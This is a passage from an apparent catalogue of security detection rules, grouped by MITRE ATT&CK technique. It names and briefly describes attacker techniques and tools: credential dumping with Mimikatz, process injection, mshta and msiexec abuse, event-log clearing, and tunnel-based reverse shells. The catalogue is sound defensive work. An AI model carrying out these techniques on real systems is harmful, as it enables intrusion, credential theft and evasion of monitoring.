  • Conti Volume Shadow Listing - Level: high
    Description: Detects a command used by conti to find volume shadow backups
  • Creation of an Executable by an Executable - Level: low
    Description: Detects the creation of an executable by another executable.
attack.t1574.011 11
Show Rules (11)
  • Service Registry Key Read Access Request - Level: low
    Description: Detects "read access" requests on the services registry key. Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.
  • Service Registry Permissions Weakness Check - Level: medium
    Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
  • Suspicious Service DACL Modification Via Set-Service Cmdlet - PS - Level: high
    Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
  • Abuse of Service Permissions to Hide Services Via Set-Service - PS - Level: high
    Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
  • Abuse of Service Permissions to Hide Services Via Set-Service - Level: high
    Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
  • Potential Privilege Escalation via Service Permissions Weakness - Level: high
    Description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level
  • Changing Existing Service ImagePath Value Via Reg.EXE - Level: medium
    Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
  • Possible Privilege Escalation via Weak Service Permissions - Level: high
    Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
  • Service DACL Abuse To Hide Services Via Sc.EXE - Level: high
    Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
  • Service Security Descriptor Tampering Via Sc.EXE - Level: medium
    Description: Detection of sc.exe utility adding a new service with special permission which hides that service.
  • Potential Persistence Attempt Via Existing Service Tampering - Level: medium
    Description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
attack.t1055.001 10
Show Rules (10)
  • Suspicious In-Memory Module Execution - Level: low
    Description: Detects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space. An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a dll loaded from disk (the standard way), it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory. Adding to this, it is not common to see such few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious.
  • MavInject Process Injection - Level: high
    Description: Detects process injection using the signed Windows tool Mavinject32.exe
  • HackTool - Potential CobaltStrike Process Injection - Level: high
    Description: Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons
  • ManageEngine Endpoint Central Dctask64.EXE Potential Abuse - Level: high
    Description: Detects the execution of "dctask64.exe", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
  • Mavinject Inject DLL Into Running Process - Level: high
    Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
  • Potential DLL Injection Or Execution Using Tracker.exe - Level: medium
    Description: Detects potential DLL injection and execution using "Tracker.exe"
  • Renamed ZOHO Dctask64 Execution - Level: high
    Description: Detects a renamed "dctask64.exe" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
  • Renamed Mavinject.EXE Execution - Level: high
    Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag
  • TAIDOOR RAT DLL Load - Level: high
    Description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load
  • CreateRemoteThread API and LoadLibrary - Level: medium
    Description: Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process
attack.t1134.001 10
Show Rules (10)
  • HackTool - NoFilter Execution - Level: high
    Description: Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators
  • Meterpreter or Cobalt Strike Getsystem Service Installation - Security - Level: high
    Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
  • Potential Access Token Abuse - Level: medium
    Description: Detects potential token impersonation and theft. Example, when using "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS flag".
  • Meterpreter or Cobalt Strike Getsystem Service Installation - System - Level: high
    Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
  • HackTool - Koh Default Named Pipe - Level: critical
    Description: Detects creation of default named pipes used by the Koh tool
  • HackTool - Impersonate Execution - Level: medium
    Description: Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
  • Potential Meterpreter/CobaltStrike Activity - Level: high
    Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting
  • HackTool - SharpImpersonation Execution - Level: high
    Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
  • HackTool - SharpDPAPI Execution - Level: high
    Description: Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.
  • Meterpreter or Cobalt Strike Getsystem Service Installation - Level: critical
    Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
attack.t1003.005 9
Show Rules (9)
  • Credential Dumping Tools Service Execution - Level: critical
    Description: Detects well-known credential dumping tools execution via service execution events
  • Credential Dumping Tools Service Execution - Security - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Credential Dumping Tools Service Execution - System - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Cred Dump Tools Dropped Files - Level: high
    Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation
  • HackTool - Credential Dumping Tools Named Pipe Created - Level: critical
    Description: Detects well-known credential dumping tools execution via specific named pipe creation
  • New Generic Credentials Added Via Cmdkey.EXE - Level: medium
    Description: Detects usage of "cmdkey.exe" to add generic credentials. As an example, this can be used before connecting to an RDP session via command line interface.
  • Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE - Level: high
    Description: Detects usage of cmdkey to look for cached credentials on the system
  • HackTool - Mimikatz Execution - Level: high
    Description: Detection well-known mimikatz command line arguments
  • Dumping of Sensitive Hives Via Reg.EXE - Level: high
    Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
attack.t1218.008 9
Show Rules (9)
  • Application Whitelisting Bypass via DLL Loaded by odbcconf.exe - Level: medium
    Description: Detects defence evasion attempt via odbcconf.exe execution to load DLL
  • Driver/DLL Installation Via Odbcconf.EXE - Level: medium
    Description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.
  • Suspicious Driver/DLL Installation Via Odbcconf.EXE - Level: high
    Description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method.
  • New DLL Registered Via Odbcconf.EXE - Level: medium
    Description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.
  • Odbcconf.EXE Suspicious DLL Location - Level: high
    Description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
  • Potentially Suspicious DLL Registered Via Odbcconf.EXE - Level: high
    Description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses.
  • Response File Execution Via Odbcconf.EXE - Level: medium
    Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.
  • Suspicious Response File Execution Via Odbcconf.EXE - Level: high
    Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.
  • Uncommon Child Process Spawned By Odbcconf.EXE - Level: medium
    Description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.
attack.t1218.005 9
Show Rules (9)
  • Possible Applocker Bypass - Level: low
    Description: Detects execution of executables that can be used to bypass Applocker whitelisting
  • HackTool - CACTUSTORCH Remote Thread Creation - Level: high
    Description: Detects remote thread creation from CACTUSTORCH as described in references.
  • Csc.EXE Execution Form Potentially Suspicious Parent - Level: high
    Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
  • Remotely Hosted HTA File Executed Via Mshta.EXE - Level: high
    Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file
  • Suspicious JavaScript Execution Via Mshta.EXE - Level: high
    Description: Detects execution of javascript code using "mshta.exe".
  • Potential LethalHTA Technique Execution - Level: high
    Description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process
  • Suspicious MSHTA Child Process - Level: high
    Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
  • MSHTA Suspicious Execution 01 - Level: high
    Description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
  • Potential Baby Shark Malware Activity - Level: high
    Description: Detects activity that could be related to Baby Shark malware
attack.t1021.006 9
Show Rules (9)
  • OMIGOD HTTP No Authentication RCE - Level: high
    Description: Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
  • Potential Remote PowerShell Session Initiated - Level: high
    Description: Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account. This could potentially indicates a remote PowerShell connection.
  • Remote PowerShell Session (PS Classic) - Level: low
    Description: Detects remote PowerShell sessions
  • Remote PowerShell Session (PS Module) - Level: high
    Description: Detects remote PowerShell sessions
  • Enable Windows Remote Management - Level: medium
    Description: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
  • Execute Invoke-command on Remote Host - Level: medium
    Description: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
  • Remote LSASS Process Access Through Windows Remote Management - Level: high
    Description: Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
  • HackTool - WinRM Access Via Evil-WinRM - Level: medium
    Description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
  • Remote PowerShell Session Host Process (WinRM) - Level: medium
    Description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).
attack.t1218.007 9
Show Rules (9)
  • MSI Installation From Web - Level: medium
    Description: Detects installation of a remote msi file from web.
  • PowerShell WMI Win32_Product Install MSI - Level: medium
    Description: Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class
  • DllUnregisterServer Function Call Via Msiexec.EXE - Level: medium
    Description: Detects MsiExec loading a DLL and calling its DllUnregisterServer function
  • Suspicious MsiExec Embedding Parent - Level: medium
    Description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads
  • Suspicious Msiexec Execute Arbitrary DLL - Level: medium
    Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
  • Msiexec Quiet Installation - Level: medium
    Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
  • Suspicious Msiexec Quiet Install From Remote Location - Level: medium
    Description: Detects usage of Msiexec.exe to install packages hosted remotely quietly
  • MsiExec Web Install - Level: medium
    Description: Detects suspicious msiexec process starts with web addresses as parameter
  • Msiexec.EXE Initiated Network Connection Over HTTP - Level: low
    Description: Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443. Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages. Use this rule to hunt for potentially anomalous or suspicious communications.
attack.t1588.002 9
Show Rules (9)
  • Hacktool Execution - Imphash - Level: critical
    Description: Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed
  • Hacktool Execution - PE Metadata - Level: high
    Description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed
  • Renamed SysInternals DebugView Execution - Level: high
    Description: Detects suspicious renamed SysInternals DebugView execution
  • Potential Execution of Sysinternals Tools - Level: low
    Description: Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools
  • PUA - Sysinternal Tool Execution - Registry - Level: low
    Description: Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key
  • Suspicious Execution Of Renamed Sysinternals Tools - Registry - Level: high
    Description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)
  • PUA - Sysinternals Tools Execution - Registry - Level: medium
    Description: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.
  • Usage of Renamed Sysinternals Tools - RegistrySet - Level: high
    Description: Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution
  • Suspicious Keyboard Layout Load - Level: medium
    Description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only
attack.t1003.006 8
Show Rules (8)
  • Credential Dumping Tools Service Execution - Level: critical
    Description: Detects well-known credential dumping tools execution via service execution events
  • Mimikatz Use - Level: high
    Description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)
  • Active Directory Replication from Non Machine Account - Level: critical
    Description: Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.
  • Mimikatz DC Sync - Level: high
    Description: Detects Mimikatz DC sync security events
  • Credential Dumping Tools Service Execution - Security - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Credential Dumping Tools Service Execution - System - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Suspicious Get-ADReplAccount - Level: medium
    Description: The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
  • HackTool - Mimikatz Execution - Level: high
    Description: Detection well-known mimikatz command line arguments
attack.t1555.003 8
Show Rules (8)
  • Accessing Encrypted Credentials from Google Chrome Login Database - Level: medium
    Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
  • Access to Browser Login Data - Level: medium
    Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
  • HackTool - WinPwn Execution - ScriptBlock - Level: high
    Description: Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • HackTool - WinPwn Execution - Level: high
    Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • PUA - WebBrowserPassView Execution - Level: medium
    Description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera
  • SQLite Chromium Profile Data DB Access - Level: high
    Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
  • Potential Browser Data Stealing - Level: medium
    Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
  • Access To Browser Credential Files By Uncommon Applications - Security - Level: low
    Description: Detects file access requests to browser credential stores by uncommon processes. Could indicate potential attempt of credential stealing This rule requires heavy baselining before usage.
attack.t1070.001 8
Show Rules (8)
  • Security Event Log Cleared - Level: medium
    Description: Checks for event id 1102 which indicates the security event log was cleared.
  • Security Eventlog Cleared - Level: high
    Description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution
  • Eventlog Cleared - Level: medium
    Description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution
  • Important Windows Eventlog Cleared - Level: high
    Description: Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution
  • Suspicious Eventlog Clear - Level: medium
    Description: Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs
  • Suspicious Windows Trace ETW Session Tamper Via Logman.EXE - Level: high
    Description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions
  • Suspicious Eventlog Clearing or Configuration Change Activity - Level: high
    Description: Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic". This technique were seen used by threat actors and ransomware strains in order to evade defenses.
  • NotPetya Ransomware Activity - Level: critical
    Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
attack.t1053.002 8
Show Rules (8)
  • Remote Schedule Task Lateral Movement via ATSvc - Level: high
    Description: Detects remote RPC calls to create or execute a scheduled task via ATSvc
  • Remote Schedule Task Lateral Movement via ITaskSchedulerService - Level: high
    Description: Detects remote RPC calls to create or execute a scheduled task
  • Remote Schedule Task Lateral Movement via SASec - Level: high
    Description: Detects remote RPC calls to create or execute a scheduled task via SASec
  • Scheduled Task/Job At - Level: low
    Description: Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code
  • MITRE BZAR Indicators for Execution - Level: medium
    Description: Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE
  • Remote Task Creation via ATSVC Named Pipe - Zeek - Level: medium
    Description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe
  • Remote Task Creation via ATSVC Named Pipe - Level: medium
    Description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe
  • Interactive AT Job - Level: high
    Description: Detects an interactive AT job, which may be used as a form of privilege escalation.
attack.t1564.001 8
Show Rules (8)
  • Hidden Files and Directories - Level: low
    Description: Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character
  • Hiding Files with Attrib.exe - Level: medium
    Description: Detects usage of attrib.exe to hide files from users.
  • Set Suspicious Files as System Files Using Attrib.EXE - Level: high
    Description: Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs
  • Use Icacls to Hide File to Everyone - Level: medium
    Description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files
  • Registry Persistence via Service in Safe Mode - Level: high
    Description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode.
  • Displaying Hidden Files Feature Disabled - Level: medium
    Description: Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. This technique is abused by several malware families to hide their files from normal users.
  • PowerShell Logging Disabled Via Registry Key Tampering - Level: high
    Description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
  • Set Files as System Files Using Attrib.EXE - Level: low
    Description: Detects the execution of "attrib" with the "+s" flag to mark files as system files
attack.t1518.001 8
Show Rules (8)
  • Security Software Discovery - Linux - Level: low
    Description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery
  • System Integrity Protection (SIP) Disabled - Level: medium
    Description: Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.
  • System Integrity Protection (SIP) Enumeration - Level: low
    Description: Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.
  • Security Software Discovery - MacOs - Level: medium
    Description: Detects usage of system utilities (only grep for now) to discover security software discovery
  • Security Software Discovery Via Powershell Script - Level: medium
    Description: Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes. Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus
  • Security Tools Keyword Lookup Via Findstr.EXE - Level: medium
    Description: Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. This detection focuses on the keywords that the attacker might use as a filter.
  • Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE - Level: high
    Description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).
  • Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet - Level: low
    Description: Detects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule" to enumerate the local firewall rules on a host.
attack.t1059.006 8
Show Rules (8)
  • File Was Not Allowed To Run - Level: medium
    Description: Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.
  • Suspicious File Characteristics Due to Missing Fields - Level: medium
    Description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
  • Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution - Level: medium
    Description: Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
  • Emotet Loader Execution Via .LNK File - Level: high
    Description: Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022. The ".lnk" file was delivered via phishing campaign.
  • Serpent Backdoor Payload Execution Via Scheduled Task - Level: high
    Description: Detects post exploitation execution technique of the Serpent backdoor. According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.
  • Python Path Configuration File Creation - Linux - Level: medium
    Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
  • Python Path Configuration File Creation - MacOS - Level: medium
    Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
  • Python Path Configuration File Creation - Windows - Level: medium
    Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
attack.t1134.002 8
Show Rules (8)
  • Meterpreter or Cobalt Strike Getsystem Service Installation - Security - Level: high
    Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
  • Meterpreter or Cobalt Strike Getsystem Service Installation - System - Level: high
    Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
  • Potential Meterpreter/CobaltStrike Activity - Level: high
    Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting
  • PUA - AdvancedRun Execution - Level: medium
    Description: Detects the execution of AdvancedRun utility
  • PUA - AdvancedRun Suspicious Execution - Level: high
    Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
  • Suspicious Child Process Created as System - Level: high
    Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts
  • Meterpreter or Cobalt Strike Getsystem Service Installation - Level: critical
    Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
  • Detection of Possible Rotten Potato - Level: high
    Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE privileges
attack.t1110.003 8
Show Rules (8)
  • Password Spraying via Explicit Credentials - Level: medium
    Description: Detects a single user failing to authenticate to multiple users using explicit credentials.
  • Multiple Users Failing to Authenticate from Single Process - Level: medium
    Description: Detects failed logins with multiple accounts from a single process on the system.
  • Valid Users Failing to Authenticate From Single Source Using Kerberos - Level: medium
    Description: Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.
  • Disabled Users Failing To Authenticate From Source Using Kerberos - Level: medium
    Description: Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.
  • Invalid Users Failing To Authenticate From Source Using Kerberos - Level: medium
    Description: Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.
  • Valid Users Failing to Authenticate from Single Source Using NTLM - Level: medium
    Description: Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.
  • Invalid Users Failing To Authenticate From Single Source Using NTLM - Level: medium
    Description: Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.
  • Multiple Users Remotely Failing To Authenticate From Single Source - Level: medium
    Description: Detects a source system failing to authenticate against a remote host with multiple users.
attack.t1567.001 7
Show Rules (7)
  • Microsoft Binary Github Communication - Level: high
    Description: Detects an executable in the Windows folder accessing github.com
  • Network Connection Initiated To BTunnels Domains - Level: medium
    Description: Detects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
  • Network Connection Initiated To Cloudflared Tunnels Domains - Level: medium
    Description: Detects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
  • Network Connection Initiated To DevTunnels Domain - Level: medium
    Description: Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
  • Network Connection Initiated To Mega.nz - Level: low
    Description: Detects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
  • Process Initiated Network Connection To Ngrok Domain - Level: high
    Description: Detects an executable initiating a network connection to "ngrok" domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
  • Network Connection Initiated To Visual Studio Code Tunnels Domain - Level: medium
    Description: Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
attack.t1098.003 7
Show Rules (7)
  • User Added to an Administrator's Azure AD Role - Level: medium
    Description: User Added to an Administrator's Azure AD Role
  • Granting Of Permissions To An Account - Level: medium
    Description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.
  • App Granted Privileged Delegated Or App Permissions - Level: high
    Description: Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions
  • App Assigned To Azure RBAC/Microsoft Entra Role - Level: medium
    Description: Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.
  • Google Workspace Application Access Level Modified - Level: medium
    Description: Detects when an access level is changed for a Google workspace application. An access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model. An adversary would be able to remove access levels to gain easier access to Google workspace resources.
  • Github Outside Collaborator Detected - Level: medium
    Description: Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.
  • Okta Admin Role Assigned to an User or Group - Level: medium
    Description: Detects when an the Administrator role is assigned to an user or group.
attack.t1053.003 7
Show Rules (7)
  • Azure Kubernetes CronJob - Level: medium
    Description: Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
  • Modifying Crontab - Level: medium
    Description: Detects suspicious modification of crontab file.
  • Persistence Via Sudoers Files - Level: medium
    Description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.
  • Persistence Via Cron Files - Level: medium
    Description: Detects creation of cron file or files in Cron directories which could indicates potential persistence.
  • Triple Cross eBPF Rootkit Default Persistence - Level: high
    Description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
  • Scheduled Cron Task/Job - Linux - Level: medium
    Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
